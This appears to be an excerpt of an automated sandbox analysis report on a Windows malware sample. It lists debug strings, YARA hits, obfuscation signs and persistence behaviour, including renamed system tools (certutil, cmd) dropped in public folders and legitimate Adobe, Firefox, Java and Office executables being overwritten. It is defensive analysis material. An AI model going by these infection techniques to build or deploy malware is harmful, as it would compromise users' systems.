                    Source: Binary string: _.pdb source: Native_neworigin.exe, 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002215E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1682798891.0000000002912000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.000000000291C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp

                    Data Obfuscation

                    Source: Yara matchFile source: 15.2.AnyDesk.PIF.2ea0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02EB894C
                    Source: AnyDesk.PIF.14.drStatic PE information: real checksum: 0x0 should be: 0x13a89c
                    Source: FXSSVC.exe.32.drStatic PE information: real checksum: 0xa20cd should be: 0x133402
                    Source: armsvc.exe.31.drStatic PE information: real checksum: 0x32318 should be: 0x1481e2
                    Source: aymtmquJ.pif.15.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                    Source: Juqmtmya.PIF.27.drStatic PE information: real checksum: 0x0 should be: 0x13a89c
                    Source: Trading_AIBot.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                    Source: alpha.exe.3.drStatic PE information: section name: .didat
                    Source: kn.exe.5.drStatic PE information: section name: .didat
                    Source: alpha.pif.23.drStatic PE information: section name: .didat
                    Source: armsvc.exe.31.drStatic PE information: section name: .didat
                    Source: alg.exe.32.drStatic PE information: section name: .didat
                    Source: FXSSVC.exe.32.drStatic PE information: section name: .didat
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1373668 push rsp; ret 9_2_00007FF7F1373669
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD2FC push 02ECD367h; ret 15_2_02ECD35F
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA63AE push 02EA640Bh; ret 15_2_02EA6403
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA63B0 push 02EA640Bh; ret 15_2_02EA6403
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECC378 push 02ECC56Eh; ret 15_2_02ECC566
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAC349 push 8B02EAC1h; ret 15_2_02EAC34E
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA332C push eax; ret 15_2_02EA3368
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD0AC push 02ECD125h; ret 15_2_02ECD11D
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB306B push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB306C push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD1F8 push 02ECD288h; ret 15_2_02ECD280
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD144 push 02ECD1ECh; ret 15_2_02ECD1E4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB3109 push 02EB30B9h; ret 15_2_02EB30B1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBF108 push ecx; mov dword ptr [esp], edx15_2_02EBF10D
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA6782 push 02EA67C6h; ret 15_2_02EA67BE
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA6784 push 02EA67C6h; ret 15_2_02EA67BE
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAD5A0 push 02EAD5CCh; ret 15_2_02EAD5C4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAC56C push ecx; mov dword ptr [esp], edx15_2_02EAC571
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECC570 push 02ECC56Eh; ret 15_2_02ECC566
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBAAE0 push 02EBAB18h; ret 15_2_02EBAB10
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8AD8 push 02EB8B10h; ret 15_2_02EB8B08
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EACA4E push 02EACD72h; ret 15_2_02EACD6A
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EACBEC push 02EACD72h; ret 15_2_02EACD6A
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB886C push 02EB88AEh; ret 15_2_02EB88A6
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02F14850 push eax; ret 15_2_02F14920
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB6948 push 02EB69F3h; ret 15_2_02EB69EB
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB6946 push 02EB69F3h; ret 15_2_02EB69EB
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB790C push 02EB7989h; ret 15_2_02EB7981
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB5E7C push ecx; mov dword ptr [esp], edx15_2_02EB5E7E
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB2F60 push 02EB2FD6h; ret 15_2_02EB2FCE
                    Source: AppVClient.exe.32.drStatic PE information: section name: .reloc entropy: 7.936517609155296
                    Source: FXSSVC.exe.32.drStatic PE information: section name: .reloc entropy: 7.942256915714289
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\6465d78f7f049fe9.bin
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pif
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pif
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIF
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIF
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
